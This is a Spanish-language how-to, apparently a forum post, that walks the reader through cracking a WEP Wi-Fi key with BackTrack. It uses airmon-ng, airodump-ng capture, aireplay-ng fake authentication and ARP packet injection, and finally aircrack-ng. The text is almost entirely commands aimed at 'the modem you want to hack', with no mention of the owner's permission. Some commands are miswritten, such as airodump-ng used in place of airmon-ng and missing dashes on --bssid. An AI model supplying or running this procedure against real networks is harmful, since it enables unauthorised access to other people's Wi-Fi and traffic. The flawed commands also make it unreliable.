Ok primero que nada deben saber que backtrack lo pueden utilizar desde una maquina virtual, desde una

memoria usb o disco live. sin necesidad de instalarlo como sistema operativo. Tambin recordar para los que es la primera vez que utilizan backtrack al arrancar este sistema les pedir un nombre de usuario y contrasea las cuales son: usuario: root Password. toor y despus de esto poner: startx Una vez realizado esto nos mostrara el escritorio de backtrack y ya podremos comenzar a realizar el hack a las redes wifi WEP 1.- Abrimos una terminal y escribimos: airmon-ng Ese comando nos mostrara las interfaces, es decir nos muestra las tarjetas de red, si tenemos una tarjeta de red externa tambin nos la mostrara como Wlan0 o como Wlan1. 2- Escribimos el siguiente comando: airodump-ng start Wlan1 De este modo lo que realizamos es habilitar en modo Monitor la tarjeta de red Inalambrica Wlan1, pueden escoger la que ustedes gusten la WLAN0 O WLAN1

3.- Escribimos el siguiente comando: airodump-ng mon0 Con este comando ya teniendo nuestra tarjeta de red en monitor lo que hace es escanear las redes Wifi que se encuentren a nuestro alcance. la dejamos 2 minutos para que encuentre redes disponibles. des pues presionamos Ctrl+C para que se detenga. Ahora seleccionamos una red y de esa red seleccionada copiamos la direccin MAC. Que es el BSSID y tambien tendremos que ver en que canal se encuentra.

airodump-ng -c 1 es el canal en el que se encuentra la seal wifi puede estar del 1 al 11 -w red1 en lugar de red1 puedes poner el nombre que tu gustes, esto es un archivo donde se guardaran toda la data que capturemos y hay se guardara la clave wepbssid 34:55:76:33:44:99 Es la direccin mac del modem que queremos sacar la clave mon0 siempre poner mon0 al final

4.- El comando queda de la siguiente manera: airodump-ng -c 1 -w red1 bssid 34:55:76:33:44:99 mon0 Ahora empezara a capturar paquetes, pero de una manera muy lenta. Para acelerar el proceso abrimos otra terminal. 5.-Y escribimos lo siguiente todo igual, excepto la direccin MAC tu colocaras la mac del modem que quieres hackear: aireplay-ng -1 6000 -q 15 -a 34:55:76:33:44:99 mon0

Ahora con esto estaremos conectados al router, lo siguiente es inyectar paquetes. Abrimos otra terminal. 6.-Escribimos el siguiente comando, recuerda que despus del -b debes poner la Mac del modem que quieres hackear: aireplay-ng -3 -b 34:55:76:33:44:99 mon0 Ahora esperemos a que empiece a inyectar paquetes, si alguien esta conectado a esa red, por ejemplo el dueo, no tardara mucho en inyectar paquetes. si no hay nadie utilizando esa red, si nadie esta conectado tardara en inyectar paquetes un poco mas, puede tardar 15min 20 min o 25min.

Despus de un tiempo comenzara a inyectar paquetes y veras como la DATA se esta incrementando e manera rpida mnimo necesitas 30,000 de DATA aunque te recomiendo mas unos 50,000 de DATA. Ya por ultimo una vez que hayas alcanzado la DATA suficiente vamos a brir otra terminal: 7.-Escribimos el siguiente comando: aircrack-ng red1-01.cap Recuerda que en el comando numero 4 al -w le dimos un nombre en mi caso fue red1 En este proceso se estar revisando la DATA capturada y al final te arrojara la contrasea y te la mostrara como Key Found: [44:55:23:76:45]

Si no te muestra la contrasea te mostrara un mensaje que dice: Para la prxima vez intenta con 50,000 esto significa que debes de esperar un poco mas en la hora de capturar DATA, que no fue suficiente, suele pasar aveces cuando el usuario cambio la clave WEP y puso una mas larga. solo es cuestin de Capturar mas DATA y listo, obtendrs la clave. Si tienes una duda Pregunta y te ayudare. Te dejo un archivo PDF donde te explica con otras palabras el proceso de Hackear Claves WEP